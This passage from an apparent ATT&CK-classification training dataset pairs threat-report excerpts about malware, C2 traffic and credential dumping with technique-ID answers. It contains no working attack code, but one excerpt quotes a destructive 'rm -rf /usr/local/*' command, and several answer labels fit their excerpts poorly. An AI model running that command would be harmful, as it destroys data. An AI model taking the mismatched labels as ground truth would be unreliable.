uses alluring documents and file names, commonly referred to as honeytraps, to trick victims into executing malicious content on their endpoints. In a few of these instances, the malicious executables in the archives contained honeytrap-themed icons to entice the victims into executing them\"", + "output": "- T1204.001: User Execution - Malicious Link" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The results are Gzipped and saved under random file in the temp folder. Following successful collection of information, the data is send back to the C2 and the file is deleted", + "output": "- T1074.001: Data Staged - Local Data Staging\n- T1560.001: Archive Collected Data - Archive via Utility" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "POWRUNER may also receive batch commands from the C2 server to collect host information from the system. An example batch command is provided in Figure 11", + "output": "- T1069.001: Permission Groups Discovery - Local Groups\n- T1087.002: Account Discovery - Domain Account\n- T1069.002: Permission Groups Discovery - Domain Groups" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "First, just like the Gh0st in the dshell paper from SANS, the decrypted protocol consists of a 5 byte header (ngLGX), a 4byte packet length field, and finally another 4 byte uncompressed length field. This is where the similarity ends as the Opcode and the data are compressed using ZLib, instead of just the data. Additionally, the entire packet is encrypted with an algorithm making visual analysis of the Wireshark data challenging. However, as the packet header is static, you can use the encrypted header as an identifier, like I did in my script. The encrypted header is: \u201c\\xEA\\xEE\\xCC\\xD3\\xB8\u201d and is unchanged throughout the malware\u2019s runthrough", + "output": "- T1132.001: Data Encoding - Standard Encoding" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Attackers like to use spear-fishing email with password protected RAR attachment to avoid being detected by the email gateway. Decryption password is provided in the mail body and inside the attachment it is a MHTML macro based document with the .doc suffix. Its purpose is to implant Imminent backdoor and gain a foothold into the target network which may make the follow up lateral movement easier to implement", + "output": "- T1027: Obfuscated Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "This cabinet file is then extracted to the previously identified file path. Again, a shortcut file is written to the %TEMP% path with a name of \u2018~Update.lnk\u2019, which is in turn copied to the identified startup path with a filename of \u2018Windows help.lnk\u2019. This shortcut file calls the built-in \u2018control.exe\u2019 utility to in turn load the previously dropped malicious CPL file of \u2018winhelp.cpl\u2019. Finally, the malware calls the \u2018winhelp.cpl\u2019 file in a new process via the following command", + "output": "- T1012: Query Registry" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "It moves the property list (plist) file com.dorusio.pkg.wallet.plist from the Installer package to the /Library/LaunchDaemons/ folder (Scheduled Task/Job: Launchd [T1053.004]). Because the LaunchDaemon will not run automatically after the plist file is moved, the postinstall script launches Dorusio_upgrade and runs it in the background (Create or Modify System Process: Launch Daemon [T1543.004", + "output": "- T1543.004: Create or Modify System Process - Launch Daemon" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The VBScript also uploads the output of the provided batch scripts to the command and control (C2) server, which provides threat actors a functional remote shell to the system", + "output": "- T1119: Automated Collection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "It uses virtualization software \u2013 QEMU on macOS and VirtualBox on Windows \u2013 to mine cryptocurrency on a Tiny Core Linux virtual machine, making it cross platform. The admins of the site also frequently update the applications with newer versions, making it difficult to track the very first version of the miner. 2) Shell scripts used to launch the QEMU images. qemuservice shell script . After the dependencies are copied over, all miner-related daemons are launched and then the actual software is installed: - qemuservice won\u2019t launch the image if the Activity Monitor process is running. In fact, if it is running, it will unload the plist that it was launched by. Before installation, version 1 of the miner is removed along with executing the command: rm -rf /usr/local/* . As seen in the listing in Script 2, it only does so when it detects a running qemu-system-x86_64 process. Launching the Linux image . All versions use multiple shell scripts to launch the images. Version 1 executes the following binaries (copies of qemu-system-x86_64) to launch the QEMU images: qemu-system-x86_64, system-monitor, tools-service. All versions use the following switches: - -M accel=hvf to use the Hypervisor framework as an accelerator. There are, however, some hints that can help you to identify when an application contains unwanted code: - A trust popup from an unexpected, \u201cadditional\u201d installer (in this case the Oracle network adapter). - High CPU consumption by a process you did not install (QEMU or VirtualBox in this case). - A new service added to the startup services list (Windows) or a new Launch Daemon (macOS). - Network connections to curious domain names (such as system-update[.]info or system-check[.]services here). Indicators of Compromise (IoCs) . Hashes . macOS \u201ccracked\u201d applications (versions 1-3) . Windows \u201ccracked\u201d applications (version 4) . Linux images . Filenames . macOS . Windows . Hostnames . Download hosts (via HTTP on port 80) . Update hosts (via SCP) . Mining hosts . MITRE ATT&CK techniques . 20 Jun 2019 - 11:00AM . Sign up to receive an email update whenever a new article is published in our Ukraine Crisis \u2013 Digital Security Resource Center . Newsletter . Similar Articles . ESET Research . Watering hole deploys new macOS malware, DazzleSpy, in Asia . Virus Bulletin: Old malware never dies \u2013 it just gets more targeted . Anatomy of native IIS malware . Some URL shortener services distribute Android malware, including banking or SMS trojans . Discussion", + "output": "- T1569.001: System Services - Launchctl" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Kimsuky is a highly motivated threat actor targeting a number of entities in South Korea. This group has been relentlessly creating new infection chains to deliver different types of malware to their victims. This campaign relies on the abuse of Blogspot to host attacker-operated blogs serving malicious VB based scripts to their targets. We've found preliminary malicious components from initial access beacons to file exfiltrators being deployed to victims. In many cases, the content of these preliminary components was combined to serve special scripts to victims.The final implants utilized by the actors in this campaign are derivatives of the Gold Dragon/Brave Prince malware families. Such targeted attacks can result in the leak of restricted research, unauthorized access for espionage and even destructive attacks against target organizations", + "output": "- T1608.001: Stage Capabilities - Upload Malware" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "If the user opens the file and the exploitation is successful, a backdoor Trojan is installed on the system that gives the attacker access and a decoy document is displayed to the victim. The main module is also responsible for communicating with its C2 servers and handling commands issued by the C2 server. Figure 8: FakeM Architecture . All FakeM variants initiate communications with its C2 server and check the C2\u2019s response for a command. After sending the acknowledgement packet, the Trojan will gather local system information and include it in a beacon to the C2 server. The Trojan uses AES to encrypt the communication channel its C2 server, which will provide one of three commands to carry out activities on the compromised system, as seen in Table 4. Unit 42 tracks this mobile Trojan as MobileOrder, as the authors specifically refer to commands within the app as orders. MobileOrder acts on instructions provided by its C2 server, which it communicates with over TCP port 3728. The C2 server will respond to requests from MobileOrder with commands that the Trojan refers to as \u201corders\u201d. MobileOrder contains a command handler with functionality that provides a fairly robust set of commands, as seen in Table 6. Table 6: MobileOrder command handler . Infrastructure Overlap and Related Tools . There is some infrastructure overlap in the C2 servers used by almost all of the FakeM variants, as well other Trojans such as MobileOrder, Psylo, and CallMe. Actors will run HTRAN on a server and configure their malware to interact with that server; however, the actor will configure HTRAN to forward traffic to another server where the actual C2 server exists", + "output": "- T1083: File and Directory Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "So far, our telemetry hasn\u2019t provided any concrete evidence that shows us how the Remexi malware spread. However, we think it\u2019s worth mentioning that for one victim we found a correlation between the execution of Remexi\u00b4s main module and the execution of an AutoIt script compiled as PE, which we believe may have dropped the malware. This dropper used an FTP with hardcoded credentials to receive its payload", + "output": "- T1059.005: Command and Scripting Interpreter - Visual Basic" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Second technique: FIN6 also leveraged the creation of Windows services (named with a random 16-character string such as IXiCDtPbtGWnrAGQ) to execute encoded PowerShell commands. The randomly named service is a by-product of using Metasploit, which creates the 16-character service by default. The encoded command contained a Metasploit reverse HTTP shellcode payload stored in a byte-array like the first technique. This C2 URL contained shellcode that would make an HTTPS request for an additional download", + "output": "- T1059.001: Command and Scripting Interpreter - PowerShell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "PowerShell Cobalt Strike Beacon -\u00a0New payload + new C2 domain - PowerShell Obfuscator -\u00a0All the new PowerShell payloads are obfuscated using a publicly available script adapted from a Daniel Bohannon\u2019s GitHub project. Using this tool, the attackers could overcome a password reset. Customized Windows Credentials Dumper -\u00a0A PowerShell password dumper that is based on a known password dumping tool, using PowerShell bypass and reflective loading. The attackers specifically used it to obtain Outlook passwords. Customized Outlook Credentials Dumper -\u00a0Inspired by known Outlook credentials dumpers", + "output": "- T1552.002: Unsecured Credentials - Credentials in Registry" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "During the first C&C call, the backdoor sends a pack with the victim\u2019s system information. All further information sent to the C&C is encrypted with a public key framework, making decryption impossible. The commands from the C&C are encrypted in a simpler manner and can be decrypted if intercepted because the secret key is hardcoded in the malware", + "output": "- T1560: Archive Collected Data\n- T1012: Query Registry" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Certutil is a living-off the land command line utility that can be used to obtain certificate authority information and configure certificate services. Threat actors usually utilize certutil to download remote files from a given URL. It also incorporates a built-in function to decode base64-encoded files", + "output": "- T1140: Deobfuscate/Decode Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In the first campaign, the email (Figure 1) purported to be from FinCERT [8] with the subject \u201c\u041f\u0430\u043c\u044f\u0442\u043a\u0430 \u043f\u043e \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u043e\u043d\u043d\u043e\u0439 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438\u201d (Information Security Notice) and contained a Microsoft Word attachment named \u201c\u0441\u0432\u043e\u0434\u043a\u04301705.doc\u201d (report1705) (Figure 3). - Another email (Figure 2) purported to be from Security Support for PCI-DSS [3] at a major credit card company with the subject line \u201c\u0411\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u044c\u201d (security) and a Microsoft Word attachment (Figure 4) \u201c\u0422\u0440\u0435\u0431\u043e\u0432\u0430\u043d\u0438\u044f \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438.doc\u201d (Safety requirements", + "output": "- T1566.001: Phishing - Spearphishing Attachment" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Web inject \u2013 the configuration file for the hooking module Once communication with the C2 is established, one of the additional modules that is downloaded is the web-inject module. It intercepts the victim\u2019s traffic by injecting the module into the browser\u2019s process and hooking the network API. The hooking module gets the execution flow from intercepted APIs, and as soon as the victim accesses certain web pages related to banking and finance, additional JavaScript is injected into the source page", + "output": "- T1185: Browser Session Hijacking\n- T1059.007: Command and Scripting Interpreter - JavaScript" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Executive summary . The PROMETHIUM threat actor \u2014 active since 2012 \u2014 has been exposed multiple times over the past several years.. However, this has not deterred this actor from continuing and expanding their activities. Talos could not pinpoint the initial attack vector, however, the use of trojanized installation files to well-known applications is consistent with the previously documented campaigns. The trojanized setup will install the malware and the legitimate application, which is a good way to disguise its activities. The usage of the HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run registry key has a persistence mechanism that has been replaced by the creation of a service. The dropped files are now stored in a folder located in C:\\DOCUME~1\\<USER>~1\\LOCALS~1\\Temp\\ always following the same pattern similar to the following: 4CA-B25C11-A27BC. If it is executed with the \"\"help\"\" parameter, it will install a service to execute itself as a service. The purpose of this tool is to parse the hard drive for files with a specific extension and create an archive with these files. SFT file creation routine Using the working directory as a base path, which in this sample case is C:\\DOCUME~1\\<USER>~1\\LOCALS~1\\Temp\\4CA-B25C11-A27BC\\, each selected file will be compressed into the file kr.zp. Mysterious Wintask.xml . Our initial analysis in a sandbox showed that the C2 contact module attempts to execute this file, searching for it in the same path as the document search module, which we further corroborated with manual analysis. Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network\"", + "output": "- T1204.002: User Execution - Malicious File" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"One, called \"\"frown.py,\"\" is responsible for the communications with the command and control (C2). It uses TLS to encrypt the communication that occurs on port 143. With a successful connection, it will send the word \"\"almond\"\" The server should reply either with \"\"who\"\" or \"\"ice. The RAT will answer the \"\"who\"\" command with a string that contains the username, computer name and the previously generated UUID. The \"\"ice\"\" command simply makes the RAT finish the connection procedure. This is responsible for the interpretation and execution of the C2 commands. The available commands are\"", + "output": "- T1033: System Owner/User Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "At the end of August 2018, the Sednit group launched a spearphishing email campaign where it distributed shortened URLs that delivered the first stage of Zebrocy components. In the past, Sednit used a similar technique for credential phishing. However, it is unusual for the group to use this technique to deliver one of its malware components directly. Previously, it had used exploits to deliver and execute the first stage malware, while in this campaign the group relied entirely on social engineering to lure victims into running the first part of the chain. The screenshot in Figure 1 shows Bitly statistics for the shortened URL used in this campaign", + "output": "- T1218.011: System Binary Proxy Execution - Rundll32" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "After the exploit succeeds, this Fallout Exploit Kit downloads a \u201c.tmp\u201d file to the %Temp% directory and calls CreateProcess to execute it. Further analysis revealed that the \u201c.tmp\u201d file was the latest variant of Azorult malware. It was the first time we\u2019ve seen the new variant of Azorult malware used as primary payload for Fallout Exploit Kit", + "output": "- T1105: Ingress Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "When initially executed, the malware will check its current working directory. Should it not match the expected path, Cardinal will enter its installation routine. Cardinal RAT will copy itself to a randomly named executable in the specified directory. It will then compile and execute embedded source code that contains watchdog functionality. Specifically, this newly spawned executable will ensure that the following registry key is set", + "output": "- T1012: Query Registry\n- T1027.004: Obfuscated Files or Information - Compile After Delivery\n- T1083: File and Directory Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "It communicates encoded system information to a single hard coded command and control (C2) server, using the system\u2019s default User-Agent string. BUGJUICE is a backdoor that is executed by launching a benign file and then hijacking the search order to load a malicious dll into it. That malicious dll then loads encrypted shellcode from the binary, which is decrypted and runs the final BUGJUICE payload. BUGJUICE defaults to TCP using a custom binary protocol to communicate with the C2, but can also use HTTP and HTTPs if directed by the C2. SNUGRIDE is a backdoor that communicates with its C2 server through HTTP requests. Messages are encrypted using AES with a static key. Persistence is maintained through a Run registry key. The versions used by APT10 (1.3.4.0, 2.0.0.0, and 2.0.0.1) are not available via the public GitHub page, indicating that APT10 has further customized the open source version. The 2.0 versions require a dropper to decipher and launch the AES encrypted QUASARRAT payload. QUASARRAT is a fully functional .NET backdoor that has been used by multiple cyber espionage groups in the past", + "output": "- T1574.001: Hijack Execution Flow - DLL Search Order Hijacking" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The ransomware also stops security software-related processes to evade detection and termination of its malicious activities", + "output": "- T1562.001: Impair Defenses - Disable or Modify Tools\n- T1518.001: Software Discovery - Security Software Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Temporary audio and video files are stored within the audio and video sub-folders respectively. After a call is finished, this data is compressed and encrypted using the same techniques previously witnessed. These files are\u00a0stored in randomly named .dat files within the Skype folder", + "output": "- T1125: Video Capture\n- T1123: Audio Capture" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "During the investigation we discovered that the Responder tool was executed from one of the victim machines that had received the spear-phishing document. One day after the initial infection, the malware operator placed the tool onto this host and executed it using the following command", + "output": "- T1204.002: User Execution - Malicious File" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The attackers used the famous Mimikatz credential dumping tool as their main tool to obtain credentials including user passwords, NTLM hashes and Kerberos tickets. Mimikatz is a very popular tool and is detected by most antivirus vendors and other security products. Therefore, the attackers used over 10 different customized Mimikatz payloads, which were obfuscated and packed in a way that allowed them to evade antivirus detection", + "output": "- T1588.002: Obtain Capabilities - Tool" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Editor\u2019s note: Following publication of this blog, it came to our attention that AhnLab encountered what appears to be an earlier version of SDBbot, described in their recent Q3 ASEC Report as a \u201cmalicious SDB file. AhnLab describes delivery of the malware in South Korean campaigns as a secondary payload to the FlawedAmmyy RAT. TA505 has been active in South Korea in 2019 and frequently distributes the FlawedAmmyy RAT, but we cannot verify the connection at this time", + "output": "- T1204.002: User Execution - Malicious File" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "CTU researchers have observed BRONZE PRESIDENT targeting multiple NGOs. The threat actors steal data from compromised systems over a long period of time, which likely indicates a long-term objective of monitoring the target's network. BRONZE PRESIDENT uses custom batch scripts to collect either specific file types (including files with .pptx, .xlsx, .pdf extensions) or all files within a specific location. CTU researchers also observed evidence that the threat actors collect credentials from high-privilege network accounts and reputationally sensitive accounts, such as social media and webmail accounts", + "output": "- T1119: Automated Collection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Next, it checks the running processes against a list of hard-coded process names; if any are found, the machine is forcefully rebooted. The names are linked to various tools used by malware researchers", + "output": "- T1518.001: Software Discovery - Security Software Discovery\n- T1057: Process Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In the obfuscated and packed version of the loader, an uncommon API call is used to facilitate code injection. As seen in the image below, the loader uses VirtualAllocExNuma to allocate new memory and store the returned base address. The beginning of an obfuscated shellcode is copied to this address after being decrypted using an RC4 algorithm.In addition to the shellcode an additional PE can be seen in memory", + "output": "- T1106: Native API" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Unlike recent variants of Mirai and Gafgyt that target vulnerable Linux systems via randomly generated IP addresses, Xbash also scans and trawls through domain names. Hadoop\u2019s unauthenticated command execution flaw discovered in October 2016, as well as the Redis arbitrary and remote command execution vulnerability disclosed in October 2015, have yet to be assigned CVE numbers. Based on the active C&C traffic, it scans and probes for open TCP or UDP ports such as HTTP, VNC, MySQL/MariaDB, Telnet, FTP, MongoDB, RDP, 